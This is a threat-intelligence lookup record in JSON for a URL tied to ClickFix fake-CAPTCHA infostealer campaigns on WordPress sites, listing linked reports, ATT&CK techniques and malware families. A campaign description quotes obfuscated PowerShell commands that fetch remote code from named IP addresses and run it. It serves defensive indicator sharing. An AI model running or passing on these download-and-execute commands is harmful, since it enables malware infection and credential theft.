{ "type": "URL", "indicator": "http://cptoptious.com/captcha.htm", "general": { "sections": [ "general", "url_list", "http_scans", "screenshot" ], "indicator": "http://cptoptious.com/captcha.htm", "type": "url", "type_title": "URL", "validation": [], "base_indicator": { "id": 4261013486, "indicator": "http://cptoptious.com/captcha.htm", "type": "URL", "title": "", "description": "", "content": "", "access_type": "public", "access_reason": "" }, "pulse_info": { "count": 3, "pulses": [ { "id": "6a040605c22effa41a9c5d76", "name": "ClickFix / Shadow DOM JS Injection Campaign \u2014 Multi-stage infostealer chain targeting WordPress sites", "description": "Observed Execution Flow: \nStage 1: Initial Access via Browser ---> Clickfix \nStage 2: Obfuscated PowerShell Execution ``` Write-Host(iex(irm((('178.'+'16')+('.52.'+'232')))))2>$null ``` \nStage 3: Secondary Payload Download A child PowerShell process (PID 4908) spawned by PID 7408 executes: ``` Invoke-WebRequest -Uri \"http://158.94.208.92\" -UseBasicParsing Invoke-Expression $checkResult.Content ``` \nStage 4: Code Compilation and Injection (csc.exe) \nStage 5: Payload Execution in svchost.exe & self-deletion when finished \nStage 6: Network Communication -> Suricata IDS detects DonutLoader requesting additional payloads from 158.94.208.104:80\n\nDetailed description available at https://secureleaf.dispensight.com/SecureLeaf-ADV-2026-WP-001.pdf", "modified": "2026-05-20T00:33:59.172000", "created": "2026-05-13T05:02:56.872000", "tags": [ "omegatech", "AS202412", "multiple infections", "antianalysis", "obfuscator.io", "evasion", "ClickFix", "powershell", "iex", "anti-debug" ], "references": [ "SecureLeaf-ADV-2026-WP-001.pdf", "https://secureleaf.dispensight.com/SecureLeaf-ADV-2026-WP-001.pdf", "" ], "public": 1, "adversary": "", "targeted_countries": [], "malware_families": [ { "id": "Donutloader", "display_name": "Donutloader", "target": null }, { "id": "TR/Rozena.Gen", "display_name": "TR/Rozena.Gen", "target": null } ], "attack_ids": [ { "id": "T1553.002", "name": "Code Signing", "display_name": "T1553.002 - Code Signing" }, { "id": "T1082", "name": "System Information Discovery", "display_name": "T1082 - System Information Discovery" }, { "id": "T1059.007", "name": "JavaScript", "display_name": "T1059.007 - JavaScript" }, { "id": "T1055.001", "name": "Dynamic-link Library Injection", "display_name": "T1055.001 - Dynamic-link Library Injection" }, { "id": "T1055.013", "name": "Process Doppelg\u00e4nging", "display_name": "T1055.013 - Process Doppelg\u00e4nging" }, { "id": "T1189", "name": "Drive-by Compromise", "display_name": "T1189 - Drive-by Compromise" }, { "id": "T1140", "name": "Deobfuscate/Decode Files or Information", "display_name": "T1140 - Deobfuscate/Decode Files or Information" }, { "id": "T1027.001", "name": "Binary Padding", "display_name": "T1027.001 - Binary Padding" }, { "id": "T1566.002", "name": "Spearphishing Link", "display_name": "T1566.002 - Spearphishing Link" }, { "id": "T1106", "name": "Native API", "display_name": "T1106 - Native API" }, { "id": "T1218.004", "name": "InstallUtil", "display_name": "T1218.004 - InstallUtil" }, { "id": "T1608.002", "name": "Upload Tool", "display_name": "T1608.002 - Upload Tool" }, { "id": "T1218.011", "name": "Rundll32", "display_name": "T1218.011 - Rundll32" }, { "id": "T1555.003", "name": "Credentials from Web Browsers", "display_name": "T1555.003 - Credentials from Web Browsers" }, { "id": "T1540", "name": "Code Injection", "display_name": "T1540 - Code Injection" }, { "id": "T1564.003", "name": "Hidden Window", "display_name": "T1564.003 - Hidden Window" }, { "id": "T1497.001", "name": "System Checks", "display_name": "T1497.001 - System Checks" }, { "id": "T1012", "name": "Query Registry", "display_name": "T1012 - Query Registry" }, { "id": "T1203", "name": "Exploitation for Client Execution", "display_name": "T1203 - Exploitation for Client Execution" }, { "id": "T1539", "name": "Steal Web Session Cookie", "display_name": "T1539 - Steal Web Session Cookie" }, { "id": "T1531", "name": "Account Access Removal", "display_name": "T1531 - Account Access Removal" }, { "id": "T1059.005", "name": "Visual Basic", "display_name": "T1059.005 - Visual Basic" }, { "id": "T1027", "name": "Obfuscated Files or Information", "display_name": "T1027 - Obfuscated Files or Information" }, { "id": "T1059.001", "name": "PowerShell", "display_name": "T1059.001 - PowerShell" }, { "id": "T1485", "name": "Data Destruction", "display_name": "T1485 - Data Destruction" } ], "industries": [], "TLP": "white", "cloned_from": null, "export_count": 7, "upvotes_count": 0, "downvotes_count": 0, "votes_count": 0, "locked": false, "pulse_source": "web", "validator_count": 0, "comment_count": 11, "follower_count": 0, "vote": 0, "author": { "username": "dispensight", "id": "404686", "avatar_url": "/otxapi/users/avatar_image/media/avatars/user_404686/resized/80/avatar_3b9c358f36.png", "is_subscribed": false, "is_following": false }, "indicator_type_counts": { "IPv4": 26, "URL": 91, "domain": 32, "hostname": 5, "FileHash-MD5": 12, "FileHash-SHA1": 10, "FileHash-SHA256": 15 }, "indicator_count": 191, "is_author": false, "is_subscribing": null, "subscriber_count": 8, "modified_text": "11 days ago ", "is_modified": true, "groups": [], "in_group": false, "threat_hunter_scannable": true, "threat_hunter_has_agents": 1, "related_indicator_type": "URL", "related_indicator_is_active": 1 }, { "id": "69bbba3ed3b01bcf222ccc1d", "name": "EbeeMar2026 Pt3", "description": "Multiple APT/threat actors, Malware and Campaigns", "modified": "2026-04-18T08:06:12.483000", "created": "2026-03-19T08:56:30.058000", "tags": [ "filehashsha256", "filehashmd5", "filehashsha1", "yara" ], "references": [ "IOCs.2026.3.csv" ], "public": 1, "adversary": "ClipXDaemon, TENGU RANSOMWARE, A0Backdoor, GlassWorm, Operation CamelClone, VOID#GEIST", "targeted_countries": [], "malware_families": [], "attack_ids": [], "industries": [], "TLP": "white", "cloned_from": null, "export_count": 2, "upvotes_count": 0, "downvotes_count": 0, "votes_count": 0, "locked": false, "pulse_source": "web", "validator_count": 0, "comment_count": 0, "follower_count": 0, "vote": 0, "author": { "username": "IMEBEEIMFINE", "id": "343873", "avatar_url": "https://otx.alienvault.com/assets/images/default-avatar.png", "is_subscribed": false, "is_following": false }, "indicator_type_counts": { "hostname": 97, "URL": 96, "CVE": 3, "FileHash-MD5": 93, "FileHash-SHA1": 101, "FileHash-SHA256": 153, "domain": 156, "email": 9 }, "indicator_count": 708, "is_author": false, "is_subscribing": null, "subscriber_count": 40, "modified_text": "42 days ago ", "is_modified": true, "groups": [], "in_group": false, "threat_hunter_scannable": true, "threat_hunter_has_agents": 1, "related_indicator_type": "URL", "related_indicator_is_active": 1 }, { "id": "69b1a513f065525df442ae88", "name": "When Trusted Websites Turn Malicious: WordPress Compromises Advance Global Stealer Operation", "description": "The following in-depth analysis of the most commonly-used CAPTCHA - the code used to secure the registration of a person using a password - has been published: (AS 202412).", "modified": "2026-04-10T17:01:02.103000", "created": "2026-03-11T17:23:31.303000", "tags": [ "cybersecurity company", "managed detection and response", "exposure management", "managed security solutions", "vulnerability management", "exposure assessment platform", "vidar", "javascript", "iocs", "clickfix", "captcha", "rapid7", "wordpress", "vidar stealer", "impure stealer", "windows", "february", "stealc", "slovakia", "powershell", "twitter", "body", "polish", "turkish", "hungarian", "czech", "swedish", "loader", "python", "stealer", "rhadamanthys", "belarus", "exodus", "bitcoin", "sha256", "doubledonut", "vodkastealer", "htmlcss", "fake captcha", "html", "loader c2s", "must" ], "references": [ "https://www.rapid7.com/blog/post/tr-malicious-websites-wordpress-compromise-advances-global-stealer-operation/" ], "public": 1, "adversary": "", "targeted_countries": [], "malware_families": [], "attack_ids": [ { "id": "T1583.001", "name": "Domains", "display_name": "T1583.001 - Domains" }, { "id": "T1584.006", "name": "Web Services", "display_name": "T1584.006 - Web Services" }, { "id": "T1587", "name": "Develop Capabilities", "display_name": "T1587 - Develop Capabilities" }, { "id": "T1588.001", "name": "Malware", "display_name": "T1588.001 - Malware" }, { "id": "T1608.001", "name": "Upload Malware", "display_name": "T1608.001 - Upload Malware" }, { "id": "T1608.004", "name": "Drive-by Target", "display_name": "T1608.004 - Drive-by Target" }, { "id": "T1189", "name": "Drive-by Compromise", "display_name": "T1189 - Drive-by Compromise" }, { "id": "T1059.001", "name": "PowerShell", "display_name": "T1059.001 - PowerShell" }, { "id": "T1140", "name": "Deobfuscate/Decode Files or Information", "display_name": "T1140 - Deobfuscate/Decode Files or Information" }, { "id": "T1027.002", "name": "Software Packing", "display_name": "T1027.002 - Software Packing" }, { "id": "T1055", "name": "Process Injection", "display_name": "T1055 - Process Injection" }, { "id": "T1497.001", "name": "System Checks", "display_name": "T1497.001 - System Checks" }, { "id": "T1497.003", "name": "Time Based Evasion", "display_name": "T1497.003 - Time Based Evasion" }, { "id": "T1555", "name": "Credentials from Password Stores", "display_name": "T1555 - Credentials from Password Stores" }, { "id": "T1539", "name": "Steal Web Session Cookie", "display_name": "T1539 - Steal Web Session Cookie" }, { "id": "T1552", "name": "Unsecured Credentials", "display_name": "T1552 - Unsecured Credentials" }, { "id": "T1071.001", "name": "Web Protocols", "display_name": "T1071.001 - Web Protocols" }, { "id": "T1132.002", "name": "Non-Standard Encoding", "display_name": "T1132.002 - Non-Standard Encoding" }, { "id": "T1573.001", "name": "Symmetric Cryptography", "display_name": "T1573.001 - Symmetric Cryptography" }, { "id": "T1104", "name": "Multi-Stage Channels", "display_name": "T1104 - Multi-Stage Channels" }, { "id": "T1095", "name": "Non-Application Layer Protocol", "display_name": "T1095 - Non-Application Layer Protocol" }, { "id": "T1571", "name": "Non-Standard Port", "display_name": "T1571 - Non-Standard Port" }, { "id": "T1102.001", "name": "Dead Drop Resolver", "display_name": "T1102.001 - Dead Drop Resolver" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel", "display_name": "T1041 - Exfiltration Over C2 Channel" } ], "industries": [], "TLP": "green", "cloned_from": null, "export_count": 3, "upvotes_count": 0, "downvotes_count": 0, "votes_count": 0, "locked": false, "pulse_source": "web", "validator_count": 0, "comment_count": 0, "follower_count": 0, "vote": 0, "author": { "username": "PetrP.73", "id": "154605", "avatar_url": "https://otx.alienvault.com/assets/images/default-avatar.png", "is_subscribed": false, "is_following": false }, "indicator_type_counts": { "URL": 65, "domain": 47, "hostname": 23, "FileHash-MD5": 5, "FileHash-SHA1": 4, "FileHash-SHA256": 22 }, "indicator_count": 166, "is_author": false, "is_subscribing": null, "subscriber_count": 541, "modified_text": "50 days ago ", "is_modified": true, "groups": [], "in_group": false, "threat_hunter_scannable": true, "threat_hunter_has_agents": 1, "related_indicator_type": "URL", "related_indicator_is_active": 1 } ], "references": [ "", "SecureLeaf-ADV-2026-WP-001.pdf", "https://www.rapid7.com/blog/post/tr-malicious-websites-wordpress-compromise-advances-global-stealer-operation/", "IOCs.2026.3.csv", "https://secureleaf.dispensight.com/SecureLeaf-ADV-2026-WP-001.pdf" ], "related": { "alienvault": { "adversary": [], "malware_families": [], "industries": [], "unique_indicators": 0 }, "other": { "adversary": [ "ClipXDaemon, TENGU RANSOMWARE, A0Backdoor, GlassWorm, Operation CamelClone, VOID#GEIST" ], "malware_families": [ "Tr/rozena.gen", "Donutloader" ], "industries": [], "unique_indicators": 909 } } }, "false_positive": [], "alexa": "http://www.alexa.com/siteinfo/cptoptious.com", "whois": "http://whois.domaintools.com/cptoptious.com", "domain": "cptoptious.com", "hostname": "Unavailable" }, "geo": {}, "geo_ipapicom": {}, "pulse_count": 3, "pulses": [ { "id": "6a040605c22effa41a9c5d76", "name": "ClickFix / Shadow DOM JS Injection Campaign \u2014 Multi-stage infostealer chain targeting WordPress sites", "description": "Observed Execution Flow: \nStage 1: Initial Access via Browser ---> Clickfix \nStage 2: Obfuscated PowerShell Execution ``` Write-Host(iex(irm((('178.'+'16')+('.52.'+'232')))))2>$null ``` \nStage 3: Secondary Payload Download A child PowerShell process (PID 4908) spawned by PID 7408 executes: ``` Invoke-WebRequest -Uri \"http://158.94.208.92\" -UseBasicParsing Invoke-Expression $checkResult.Content ``` \nStage 4: Code Compilation and Injection (csc.exe) \nStage 5: Payload Execution in svchost.exe & self-deletion when finished \nStage 6: Network Communication -> Suricata IDS detects DonutLoader requesting additional payloads from 158.94.208.104:80\n\nDetailed description available at https://secureleaf.dispensight.com/SecureLeaf-ADV-2026-WP-001.pdf", "modified": "2026-05-20T00:33:59.172000", "created": "2026-05-13T05:02:56.872000", "tags": [ "omegatech", "AS202412", "multiple infections", "antianalysis", "obfuscator.io", "evasion", "ClickFix", "powershell", "iex", "anti-debug" ], "references": [ "SecureLeaf-ADV-2026-WP-001.pdf", "https://secureleaf.dispensight.com/SecureLeaf-ADV-2026-WP-001.pdf", "" ], "public": 1, "adversary": "", "targeted_countries": [], "malware_families": [ { "id": "Donutloader", "display_name": "Donutloader", "target": null }, { "id": "TR/Rozena.Gen", "display_name": "TR/Rozena.Gen", "target": null } ], "attack_ids": [ { "id": "T1553.002", "name": "Code Signing", "display_name": "T1553.002 - Code Signing" }, { "id": "T1082", "name": "System Information Discovery", "display_name": "T1082 - System Information Discovery" }, { "id": "T1059.007", "name": "JavaScript", "display_name": "T1059.007 - JavaScript" }, { "id": "T1055.001", "name": "Dynamic-link Library Injection", "display_name": "T1055.001 - Dynamic-link Library Injection" }, { "id": "T1055.013", "name": "Process Doppelg\u00e4nging", "display_name": "T1055.013 - Process Doppelg\u00e4nging" }, { "id": "T1189", "name": "Drive-by Compromise", "display_name": "T1189 - Drive-by Compromise" }, { "id": "T1140", "name": "Deobfuscate/Decode Files or Information", "display_name": "T1140 - Deobfuscate/Decode Files or Information" }, { "id": "T1027.001", "name": "Binary Padding", "display_name": "T1027.001 - Binary Padding" }, { "id": "T1566.002", "name": "Spearphishing Link", "display_name": "T1566.002 - Spearphishing Link" }, { "id": "T1106", "name": "Native API", "display_name": "T1106 - Native API" }, { "id": "T1218.004", "name": "InstallUtil", "display_name": "T1218.004 - InstallUtil" }, { "id": "T1608.002", "name": "Upload Tool", "display_name": "T1608.002 - Upload Tool" }, { "id": "T1218.011", "name": "Rundll32", "display_name": "T1218.011 - Rundll32" }, { "id": "T1555.003", "name": "Credentials from Web Browsers", "display_name": "T1555.003 - Credentials from Web Browsers" }, { "id": "T1540", "name": "Code Injection", "display_name": "T1540 - Code Injection" }, { "id": "T1564.003", "name": "Hidden Window", "display_name": "T1564.003 - Hidden Window" }, { "id": "T1497.001", "name": "System Checks", "display_name": "T1497.001 - System Checks" }, { "id": "T1012", "name": "Query Registry", "display_name": "T1012 - Query Registry" }, { "id": "T1203", "name": "Exploitation for Client Execution", "display_name": "T1203 - Exploitation for Client Execution" }, { "id": "T1539", "name": "Steal Web Session Cookie", "display_name": "T1539 - Steal Web Session Cookie" }, { "id": "T1531", "name": "Account Access Removal", "display_name": "T1531 - Account Access Removal" }, { "id": "T1059.005", "name": "Visual Basic", "display_name": "T1059.005 - Visual Basic" }, { "id": "T1027", "name": "Obfuscated Files or Information", "display_name": "T1027 - Obfuscated Files or Information" }, { "id": "T1059.001", "name": "PowerShell", "display_name": "T1059.001 - PowerShell" }, { "id": "T1485", "name": "Data Destruction", "display_name": "T1485 - Data Destruction" } ], "industries": [], "TLP": "white", "cloned_from": null, "export_count": 7, "upvotes_count": 0, "downvotes_count": 0, "votes_count": 0, "locked": false, "pulse_source": "web", "validator_count": 0, "comment_count": 11, "follower_count": 0, "vote": 0, "author": { "username": "dispensight", "id": "404686", "avatar_url": "/otxapi/users/avatar_image/media/avatars/user_404686/resized/80/avatar_3b9c358f36.png", "is_subscribed": false, "is_following": false }, "indicator_type_counts": { "IPv4": 26, "URL": 91, "domain": 32, "hostname": 5, "FileHash-MD5": 12, "FileHash-SHA1": 10, "FileHash-SHA256": 15 }, "indicator_count": 191, "is_author": false, "is_subscribing": null, "subscriber_count": 8, "modified_text": "11 days ago ", "is_modified": true, "groups": [], "in_group": false, "threat_hunter_scannable": true, "threat_hunter_has_agents": 1, "related_indicator_type": "URL", "related_indicator_is_active": 1 }, { "id": "69bbba3ed3b01bcf222ccc1d", "name": "EbeeMar2026 Pt3", "description": "Multiple APT/threat actors, Malware and Campaigns", "modified": "2026-04-18T08:06:12.483000", "created": "2026-03-19T08:56:30.058000", "tags": [ "filehashsha256", "filehashmd5", "filehashsha1", "yara" ], "references": [ "IOCs.2026.3.csv" ], "public": 1, "adversary": "ClipXDaemon, TENGU RANSOMWARE, A0Backdoor, GlassWorm, Operation CamelClone, VOID#GEIST", "targeted_countries": [], "malware_families": [], "attack_ids": [], "industries": [], "TLP": "white", "cloned_from": null, "export_count": 2, "upvotes_count": 0, "downvotes_count": 0, "votes_count": 0, "locked": false, "pulse_source": "web", "validator_count": 0, "comment_count": 0, "follower_count": 0, "vote": 0, "author": { "username": "IMEBEEIMFINE", "id": "343873", "avatar_url": "https://otx.alienvault.com/assets/images/default-avatar.png", "is_subscribed": false, "is_following": false }, "indicator_type_counts": { "hostname": 97, "URL": 96, "CVE": 3, "FileHash-MD5": 93, "FileHash-SHA1": 101, "FileHash-SHA256": 153, "domain": 156, "email": 9 }, "indicator_count": 708, "is_author": false, "is_subscribing": null, "subscriber_count": 40, "modified_text": "42 days ago ", "is_modified": true, "groups": [], "in_group": false, "threat_hunter_scannable": true, "threat_hunter_has_agents": 1, "related_indicator_type": "URL", "related_indicator_is_active": 1 }, { "id": "69b1a513f065525df442ae88", "name": "When Trusted Websites Turn Malicious: WordPress Compromises Advance Global Stealer Operation", "description": "The following in-depth analysis of the most commonly-used CAPTCHA - the code used to secure the registration of a person using a password - has been published: (AS 202412).", "modified": "2026-04-10T17:01:02.103000", "created": "2026-03-11T17:23:31.303000", "tags": [ "cybersecurity company", "managed detection and response", "exposure management", "managed security solutions", "vulnerability management", "exposure assessment platform", "vidar", "javascript", "iocs", "clickfix", "captcha", "rapid7", "wordpress", "vidar stealer", "impure stealer", "windows", "february", "stealc", "slovakia", "powershell", "twitter", "body", "polish", "turkish", "hungarian", "czech", "swedish", "loader", "python", "stealer", "rhadamanthys", "belarus", "exodus", "bitcoin", "sha256", "doubledonut", "vodkastealer", "htmlcss", "fake captcha", "html", "loader c2s", "must" ], "references": [ "https://www.rapid7.com/blog/post/tr-malicious-websites-wordpress-compromise-advances-global-stealer-operation/" ], "public": 1, "adversary": "", "targeted_countries": [], "malware_families": [], "attack_ids": [ { "id": "T1583.001", "name": "Domains", "display_name": "T1583.001 - Domains" }, { "id": "T1584.006", "name": "Web Services", "display_name": "T1584.006 - Web Services" }, { "id": "T1587", "name": "Develop Capabilities", "display_name": "T1587 - Develop Capabilities" }, { "id": "T1588.001", "name": "Malware", "display_name": "T1588.001 - Malware" }, { "id": "T1608.001", "name": "Upload Malware", "display_name": "T1608.001 - Upload Malware" }, { "id": "T1608.004", "name": "Drive-by Target", "display_name": "T1608.004 - Drive-by Target" }, { "id": "T1189", "name": "Drive-by Compromise", "display_name": "T1189 - Drive-by Compromise" }, { "id": "T1059.001", "name": "PowerShell", "display_name": "T1059.001 - PowerShell" }, { "id": "T1140", "name": "Deobfuscate/Decode Files or Information", "display_name": "T1140 - Deobfuscate/Decode Files or Information" }, { "id": "T1027.002", "name": "Software Packing", "display_name": "T1027.002 - Software Packing" }, { "id": "T1055", "name": "Process Injection", "display_name": "T1055 - Process Injection" }, { "id": "T1497.001", "name": "System Checks", "display_name": "T1497.001 - System Checks" }, { "id": "T1497.003", "name": "Time Based Evasion", "display_name": "T1497.003 - Time Based Evasion" }, { "id": "T1555", "name": "Credentials from Password Stores", "display_name": "T1555 - Credentials from Password Stores" }, { "id": "T1539", "name": "Steal Web Session Cookie", "display_name": "T1539 - Steal Web Session Cookie" }, { "id": "T1552", "name": "Unsecured Credentials", "display_name": "T1552 - Unsecured Credentials" }, { "id": "T1071.001", "name": "Web Protocols", "display_name": "T1071.001 - Web Protocols" }, { "id": "T1132.002", "name": "Non-Standard Encoding", "display_name": "T1132.002 - Non-Standard Encoding" }, { "id": "T1573.001", "name": "Symmetric Cryptography", "display_name": "T1573.001 - Symmetric Cryptography" }, { "id": "T1104", "name": "Multi-Stage Channels", "display_name": "T1104 - Multi-Stage Channels" }, { "id": "T1095", "name": "Non-Application Layer Protocol", "display_name": "T1095 - Non-Application Layer Protocol" }, { "id": "T1571", "name": "Non-Standard Port", "display_name": "T1571 - Non-Standard Port" }, { "id": "T1102.001", "name": "Dead Drop Resolver", "display_name": "T1102.001 - Dead Drop Resolver" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel", "display_name": "T1041 - Exfiltration Over C2 Channel" } ], "industries": [], "TLP": "green", "cloned_from": null, "export_count": 3, "upvotes_count": 0, "downvotes_count": 0, "votes_count": 0, "locked": false, "pulse_source": "web", "validator_count": 0, "comment_count": 0, "follower_count": 0, "vote": 0, "author": { "username": "PetrP.73", "id": "154605", "avatar_url": "https://otx.alienvault.com/assets/images/default-avatar.png", "is_subscribed": false, "is_following": false }, "indicator_type_counts": { "URL": 65, "domain": 47, "hostname": 23, "FileHash-MD5": 5, "FileHash-SHA1": 4, "FileHash-SHA256": 22 }, "indicator_count": 166, "is_author": false, "is_subscribing": null, "subscriber_count": 541, "modified_text": "50 days ago ", "is_modified": true, "groups": [], "in_group": false, "threat_hunter_scannable": true, "threat_hunter_has_agents": 1, "related_indicator_type": "URL", "related_indicator_is_active": 1 } ], "error": null, "vt": { "error": "VirusTotal rate limit reached. Try again shortly.", "indicator": "http://cptoptious.com/captcha.htm", "type": "URL" }, "abuseipdb": null, "urlhaus": { "indicator": "http://cptoptious.com/captcha.htm", "type": "URL", "found": false, "verdict": "clean", "error": null }, "from_cache": true, "_cached_at": 1780203515.9721696 }